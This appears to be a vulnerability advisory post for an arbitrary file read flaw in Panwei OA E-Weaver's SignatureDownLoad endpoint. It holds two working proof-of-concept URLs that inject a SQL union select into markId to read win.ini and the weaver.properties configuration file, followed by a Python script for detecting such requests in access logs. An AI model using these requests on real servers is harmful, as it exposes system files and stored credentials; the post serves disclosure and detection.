Fanwei Oa E Weaver Signaturedownload Arbitrary File Reading Vulnerability
Panwei OA E-Weaver SignatureDownLoad Arbitrary File Read Vulnerability
Vulnerability Description
The SignatureDownLoad interface of Panwei OA E-Weaver contains an arbitrary file read vulnerability. An attacker can use it to read any file on the server.
Vulnerability Impact
Panwei OA E-Weaver
Network surveying and mapping
Vulnerability Reproduction
Verification PoC
/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27C:/Windows/win.ini%27
/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27
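Detection sketch for the requests above, as an added example that is not part of the original post: it scans web access logs for calls to the SignatureDownLoad endpoint whose markId is not a plain integer. The log format, the sample lines (constructed, except the request copied from this page), and the assumption that a legitimate markId is numeric are mine.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint taken from the PoC requests on this page (compared case-insensitively).
ENDPOINT = "/weaver/weaver.file.signaturedownload"
# Assumption: a legitimate markId is a plain integer record id.
NUMERIC_ID = re.compile(r"^\d+$")
# Request line as it appears in a common/combined-format access log.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_unquote(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (catches double encoding)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_mark_ids(log_line):
    """Return decoded markId values in this log line that are not plain integers."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not fully_unquote(url.path).lower().endswith(ENDPOINT):
        return []
    hits = []
    for key, values in parse_qs(url.query, keep_blank_values=True).items():
        if key.lower() == "markid":
            hits += [d for d in (fully_unquote(v).strip() for v in values)
                     if not NUMERIC_ID.match(d)]
    return hits

def scan(lines):
    """Return (client_ip, decoded markId) for every suspicious request."""
    return [(line.split(" ", 1)[0], v) for line in lines for v in suspicious_mark_ids(line)]

# Constructed sample log; documentation-range IPs, made-up timestamps and sizes.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /weaver/weaver.file.SignatureDownLoad?markId=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27C:/Windows/win.ini%27 HTTP/1.1" 200 92',
    '203.0.113.9 - - [01/Jan/2024:10:00:06 +0000] "GET /weaver/weaver.file.SignatureDownLoad?markId=0%2520union%2520select%2520%2527x%2527 HTTP/1.1" 200 0',
    '198.51.100.4 - - [01/Jan/2024:10:00:09 +0000] "GET /index.jsp?markId=abc HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}: non-numeric markId -> {value!r}")
```

Parameters sent in a POST body do not appear in access logs, so the same check would need to run at a WAF or reverse proxy to cover them.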
This post is licensed under CC BY 4.0 by the author.